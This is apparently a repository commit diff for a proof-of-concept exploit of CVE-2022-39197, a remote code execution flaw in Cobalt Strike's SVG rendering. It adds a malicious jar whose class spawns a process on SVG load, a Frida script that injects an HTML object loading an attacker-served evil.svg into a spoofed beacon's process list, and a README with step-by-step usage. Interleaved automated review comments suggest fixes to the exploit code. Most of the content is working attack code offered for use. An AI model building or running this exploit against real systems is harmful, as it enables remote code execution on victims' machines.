Projects STRLCPY CVE-2022-39197 Commits f98a6790
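--- a/EvilJar/META-INF/MANIFEST.MF
+++ b/EvilJar/META-INF/MANIFEST.MF
@@ -0,0 +1,4 @@
+Manifest-Version: 1.0
+SVG-Handler-Class: Exploit
+
+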
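--- a/EvilJar/pom.xml
+++ b/EvilJar/pom.xml
@@ -0,0 +1,48 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+ <modelVersion>4.0.0</modelVersion>
+
+ <groupId>Exploit</groupId>
+ <artifactId>EvilJar</artifactId>
+ <version>1.0</version>
+ <dependencies>
+ <dependency>
+ <groupId>xml-apis</groupId>
+ <artifactId>xml-apis-ext</artifactId>
+ <version>1.3.04</version>
+ </dependency>
+ </dependencies>
+
+ <properties>
+ <maven.compiler.source>8</maven.compiler.source>
+ <maven.compiler.target>8</maven.compiler.target>
+ <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+ <project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding>
+ </properties>
+ <build>
+ <plugins>
+ <plugin>
+ <artifactId>maven-assembly-plugin</artifactId>
+ <configuration>
+ <archive>
+ <manifestFile>
+ ${project.basedir}/META-INF/MANIFEST.MF
+ </manifestFile>
+ </archive>
+ <descriptorRefs>
+ <descriptorRef>jar-with-dependencies</descriptorRef>
+ </descriptorRefs>
+ </configuration>
+ <executions>
+ <execution>
+ <id>make-assembly</id> <!-- this is used for inheritance merges -->
+ <phase>package</phase> <!-- bind to the packaging phase -->
+ <goals>
+ <goal>single</goal>
+ </goals>
+ </execution>
+ </executions>
+ </plugin>
+ </plugins>
+ </build>
+</project>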
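Review bot: The `maven-assembly-plugin` declaration at line 25 carries no `<version>`, so the build resolves whichever plugin release the local Maven installation or a parent POM happens to supply, and Maven warns that the build is not reproducible. Pin it next to the artifactId, `<version>PLUGIN_VERSION</version>` (placeholder for the release the build was tested with), the same way `xml-apis-ext` is pinned at line 12. The `jar-with-dependencies` descriptor at line 33 also bundles `xml-apis-ext` into the output jar; a comment on the dependency stating why it is needed (presumably only for the `org.w3c.dom.svg` interfaces that `Exploit.java` compiles against) would tell a later maintainer whether bundling it is intended.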
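--- a/EvilJar/src/main/java/Exploit.java
+++ b/EvilJar/src/main/java/Exploit.java
@@ -0,0 +1,26 @@
+import org.w3c.dom.events.Event;
+import org.w3c.dom.events.EventListener;
+
+import org.w3c.dom.svg.EventListenerInitializer;
+import org.w3c.dom.svg.SVGDocument;
+import org.w3c.dom.svg.SVGSVGElement;
+
+import java.util.*;
+import java.io.*;
+
+public class Exploit implements EventListenerInitializer {
+ public Exploit() {
+ }
+ public void initializeEventListeners(SVGDocument document) {
+ SVGSVGElement root = document.getRootElement();
+ EventListener listener = new EventListener() {
+ public void handleEvent(Event event) {
+ try {
+ Process p = Runtime.getRuntime().exec("/usr/bin/mate-calc");
+ } catch (Exception e) {}
+ }
+ };
+ root.addEventListener("SVGLoad", listener, false);
+ }
+
+}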
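Review bot: The anonymous listener at lines 16–22 swallows every failure with the empty `catch (Exception e) {}` at line 20 and stores the `Process` in a local `p` at line 19 that is never read; dropping the local, `Runtime.getRuntime().exec("/usr/bin/mate-calc");`, and at least logging in the catch would stop errors from vanishing silently. The class also has no comment tying it to the manifest: a header such as `// Loaded because the jar's manifest names this class in SVG-Handler-Class; initializeEventListeners registers an SVGLoad listener that spawns a process` would document the control flow that makes a third-party SVG-handler jar something a reviewer must inspect before allowing it to load. Whether Batik invokes `initializeEventListeners` before or after `SVGLoad` is dispatched is not visible here, so that comment should be checked against the Batik version in use. The `java.util.*` and `java.io.*` imports at lines 8–9 are unused and can be removed.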
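--- a/README.md
+++ b/README.md
@@ -0,0 +1,27 @@
+# **CVE-2022-39197 RCE POC**
+
+### Usage
+
+- **Prepare Payload**
+1. Edit `Line 19` with your payload in `EvilJar/src/main/java/Exploit.java`
+2. Build using jar `mvn clean compile assembly:single`
+3. Move `EvilJar-1.0-jar-with-dependencies.jar` from `EvilJar/target/` to `serve/` folder
+4. Edit `serve\evil.svg` replace `[attacker]`
+5. Serve using `python3 -m http.server 8080`
+
+- **Execute Exploit**
+
+```
+python3 cve-2022-39197.py beacon.exe http://10.10.10.2:8080/evil.svg
+```
+
+Payload will be triggered as soon as the user scrolls through Process List
+
+### POC.JPG?
+![1.jpg](./images/1.jpg)
+
+
+### Reference Links
+
+[https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg](https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg) — There’s a great in depth analysis of this vulnerability
+[https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html](https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html)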
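--- a/cve-2022-39197.py
+++ b/cve-2022-39197.py
@@ -0,0 +1,42 @@
+import frida
+import time
+import sys
+
+def processInject(target, url):
+ print('[+] Spawning target process')
+
+ pid=frida.spawn(target)
+ session=frida.attach(pid)
+
+ frida_script ='''
+ var payload="<html><object classid='org.apache.batik.swing.JSVGCanvas'><param name='URI' value='USER_PAYLOAD'></param></object>"
+ var pProcess32Next = Module.findExportByName("kernel32.dll", "Process32Next")
+
+ Interceptor.attach(pProcess32Next, {
+ onEnter: function(args) {
+ this.pPROCESSENTRY32 = args[1];
+ },
+ onLeave: function(retval) {
+ if(this.pPROCESSENTRY32.add(44).readAnsiString() == "beacon.exe") {
+ send("[!] Found beacon, injecting payload");
+ this.pPROCESSENTRY32.add(44).writeAnsiString(payload);
+ }
+ }
+ })
+ '''.replace("USER_PAYLOAD",url)
+
+ script = session.create_script(frida_script)
+ script.load()
+ frida.resume(pid)
+ #make sure payload is triggered on client
+ print("[+] Waiting for 100 seconds")
+ time.sleep(100)
+ frida.kill(pid)
+ print('[+] Done! Killed beacon process.')
+ exit(0)
+
+if __name__=='__main__':
+ if len(sys.argv) == 3:
+ processInject(sys.argv[1], sys.argv[2])
+ else:
+ print("[-] Incorrect Usage!\n\nExample: python3 {} beacon.exe http://10.10.10.2:8080/evil.svg".format(sys.argv[0]))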
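Review bot: The teardown `frida.kill(pid)` at line 34 never runs if `create_script` or `load` at lines 28–29 raise, so the process spawned at line 8 is left running on the operator's own host, and `exit(0)` at line 36 calls the `site` builtin from inside library code. Wrapping lines 28–33 in `try:` with `finally: frida.kill(pid)` and replacing `exit(0)` with `return` (the `__main__` guard already ends the script) addresses both. The constant `44` at lines 20 and 22 of the embedded script should also be explained, e.g. `// 44 == offset of PROCESSENTRY32.szExeFile in the 64-bit struct layout`, because the hook silently matches nothing under any other layout. The fixed `time.sleep(100)` at line 33 deserves a comment stating that it is the window the hooked process is kept alive before teardown rather than a synchronisation point.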
  • images/1.jpg
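--- a/requirements.txt
+++ b/requirements.txt
@@ -0,0 +1,1 @@
+frida-tools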
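Review bot: `frida-tools` at line 1 is unpinned, and `cve-2022-39197.py` imports `frida` directly rather than anything from `frida-tools`, so the file records neither the Frida release the hook was written against nor the module the script actually needs. Listing the direct dependency with a pin, `frida==FRIDA_VERSION` (placeholder for the tested release), keeps the environment reproducible and makes a later incompatible Frida API change show up as an explicit version mismatch.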
  • serve/evil.svg